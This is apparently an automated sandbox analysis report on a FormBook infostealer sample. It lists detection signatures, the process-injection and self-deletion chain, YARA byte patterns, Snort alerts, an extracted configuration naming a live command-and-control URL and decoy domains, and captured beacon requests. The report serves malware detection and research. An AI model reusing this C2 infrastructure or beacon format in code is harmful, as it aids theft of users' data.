Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 5t2CmTUhKc.exe

Overview

General Information

Sample Name:5t2CmTUhKc.exe
Analysis ID:433074
MD5:116e736ba00fca4b8499c4df00796454
SHA1:a8d3d62db4bd49e24c2bda3d0d81c3be25a81dae
SHA256:096ca35528ef4f702e93f5f17d7954f26fb48acd4526794ce1ee99d27cf1a4c3
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 5t2CmTUhKc.exe (PID: 6368 cmdline: 'C:\Users\user\Desktop\5t2CmTUhKc.exe' MD5: 116E736BA00FCA4B8499C4DF00796454)
    • 5t2CmTUhKc.exe (PID: 6432 cmdline: 'C:\Users\user\Desktop\5t2CmTUhKc.exe' MD5: 116E736BA00FCA4B8499C4DF00796454)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • help.exe (PID: 7136 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
        • cmd.exe (PID: 5696 cmdline: /c del 'C:\Users\user\Desktop\5t2CmTUhKc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.oceancollaborative.com/bp3i/"], "decoy": ["bancambios.network", "centroufologicosiciliano.info", "personalloansonline.xyz", "xn---yado-8e4dze0c.site", "americanscientific.net", "5australiacl.com", "sportsiri.com", "harchain.com", "oakandivywedding.com", "getbattlevizion.com", "laurenamason.com", "middreampostal.com", "realityawarenetworks.com", "purpleqube.com", "reufhroir.com", "dr-farshidtajik.com", "spinecompanion.com", "grpsexportsandimports.com", "nodeaths.com", "indylead.com", "payplrif617592.info", "counteraction.fund", "t4mall.com", "lnbes.com", "5xlsteve.com", "kocaelimanliftkiralama.site", "jacksonmesser.com", "nicehips.xyz", "accelerator.sydney", "dembyanndson.com", "tori2020.com", "ilium-partners.com", "amazingfinds4u.com", "therebelpartyband.com", "mutanterestaurante.com", "underce.com", "foldarusa.com", "canyoufindme.info", "fewo-zweifall.com", "fredrika-stahl.com", "bankalmatajer.com", "themindsetbreakthrough.com", "kesat-ya10.com", "9wsc.com", "jimmymasks.com", "bluebeltpanobuy.com", "my-ela.com", "motivactivewear.com", "myrivercityhomeimprovements.com", "xn--2o2b1z87x8sb.com", "pholbhf.icu", "8ballsportsbook.com", "doodstore.net", "shenghui118.com", "glavstore.com", "mydystopianlife.com", "woodlandsceinics.com", "trickshow.club", "vitali-tea.online", "thechandeck.com", "blinbins.com", "mcgcompetition.com", "xrglm.com", "mikefling.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.5t2CmTUhKc.exe.2290000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.5t2CmTUhKc.exe.2290000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.5t2CmTUhKc.exe.2290000.3.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        2.2.5t2CmTUhKc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.5t2CmTUhKc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.thechandeck.com/bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFdAvira URL Cloud: Label: malware
          Source: http://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFdAvira URL Cloud: Label: phishing
          Source: https://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/VzAvira URL Cloud: Label: phishing
          Found malware configurationShow sources
          Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.oceancollaborative.com/bp3i/"], "decoy": ["bancambios.network", "centroufologicosiciliano.info", "personalloansonline.xyz", "xn---yado-8e4dze0c.site", "americanscientific.net", "5australiacl.com", "sportsiri.com", "harchain.com", "oakandivywedding.com", "getbattlevizion.com", "laurenamason.com", "middreampostal.com", "realityawarenetworks.com", "purpleqube.com", "reufhroir.com", "dr-farshidtajik.com", "spinecompanion.com", "grpsexportsandimports.com", "nodeaths.com", "indylead.com", "payplrif617592.info", "counteraction.fund", "t4mall.com", "lnbes.com", "5xlsteve.com", "kocaelimanliftkiralama.site", "jacksonmesser.com", "nicehips.xyz", "accelerator.sydney", "dembyanndson.com", "tori2020.com", "ilium-partners.com", "amazingfinds4u.com", "therebelpartyband.com", "mutanterestaurante.com", "underce.com", "foldarusa.com", "canyoufindme.info", "fewo-zweifall.com", "fredrika-stahl.com", "bankalmatajer.com", "themindsetbreakthrough.com", "kesat-ya10.com", "9wsc.com", "jimmymasks.com", "bluebeltpanobuy.com", "my-ela.com", "motivactivewear.com", "myrivercityhomeimprovements.com", "xn--2o2b1z87x8sb.com", "pholbhf.icu", "8ballsportsbook.com", "doodstore.net", "shenghui118.com", "glavstore.com", "mydystopianlife.com", "woodlandsceinics.com", "trickshow.club", "vitali-tea.online", "thechandeck.com", "blinbins.com", "mcgcompetition.com", "xrglm.com", "mikefling.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 5t2CmTUhKc.exeVirustotal: Detection: 28%Perma Link
          Source: 5t2CmTUhKc.exeReversingLabs: Detection: 28%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 5t2CmTUhKc.exeJoe Sandbox ML: detected
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.5t2CmTUhKc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.help.exe.4ed3f8.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 11.2.help.exe.35c7960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.1.5t2CmTUhKc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5t2CmTUhKc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.369588709.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 5t2CmTUhKc.exe, 00000000.00000003.333908194.00000000099B0000.00000004.00000001.sdmp, 5t2CmTUhKc.exe, 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, help.exe, 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 5t2CmTUhKc.exe, help.exe
          Source: Binary string: help.pdbGCTL source: 5t2CmTUhKc.exe, 00000002.00000002.416428242.0000000000AA0000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: 5t2CmTUhKc.exe, 00000002.00000002.416428242.0000000000AA0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.369588709.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 185.224.138.83:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 185.224.138.83:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 185.224.138.83:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.oceancollaborative.com/bp3i/
          Source: global trafficHTTP traffic detected: GET /bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFd HTTP/1.1Host: www.thechandeck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=So2Tvg87hIziEtO/Cru7EIQwZdKNOPQNXuBCwKB1xQ7qfTi1ynPiyI53Zc3PyJmgTVsVUbeTjw== HTTP/1.1Host: www.bancambios.networkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd HTTP/1.1Host: www.purpleqube.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=IptNrmuXUVaV/Z9910/N9dyZxtPI5jyScGKXmfxiWqbBXO2QZbfIAu6+lQXyF1DTVkAc6YCxuQ== HTTP/1.1Host: www.middreampostal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?o6tTHHhh=G/6vsm0KxG9qmRdgnTa4hWK9fX8ri3vqlPmeKNZjc+yTORxazFkMTyGVd6qzkwgGx7fuosCohA==&3fuD_=S2MtYLGX0vFd HTTP/1.1Host: www.xn---yado-8e4dze0c.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd785YA8v1+XbYT2uw== HTTP/1.1Host: www.oceancollaborative.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: CYBERCONUS CYBERCONUS
          Source: Joe Sandbox ViewASN Name: AS-HOSTINGERLT AS-HOSTINGERLT
          Source: Joe Sandbox ViewASN Name: SOFTLAYERUS SOFTLAYERUS
          Source: global trafficHTTP traffic detected: GET /bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFd HTTP/1.1Host: www.thechandeck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=So2Tvg87hIziEtO/Cru7EIQwZdKNOPQNXuBCwKB1xQ7qfTi1ynPiyI53Zc3PyJmgTVsVUbeTjw== HTTP/1.1Host: www.bancambios.networkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd HTTP/1.1Host: www.purpleqube.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=IptNrmuXUVaV/Z9910/N9dyZxtPI5jyScGKXmfxiWqbBXO2QZbfIAu6+lQXyF1DTVkAc6YCxuQ== HTTP/1.1Host: www.middreampostal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?o6tTHHhh=G/6vsm0KxG9qmRdgnTa4hWK9fX8ri3vqlPmeKNZjc+yTORxazFkMTyGVd6qzkwgGx7fuosCohA==&3fuD_=S2MtYLGX0vFd HTTP/1.1Host: www.xn---yado-8e4dze0c.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd785YA8v1+XbYT2uw== HTTP/1.1Host: www.oceancollaborative.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.bluebeltpanobuy.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlLast-Modified: Tue, 25 Jun 2019 07:07:25 GMTEtag: "999-5d11c82d-331806d17fbda5d0;;;"Accept-Ranges: bytesContent-Length: 2457Date: Fri, 11 Jun 2021 06:55:14 GMTServer: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 2
          Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpString found in binary or memory: http://dfltweb1.onamae.com
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 5t2CmTUhKc.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 5t2CmTUhKc.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.344027143.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
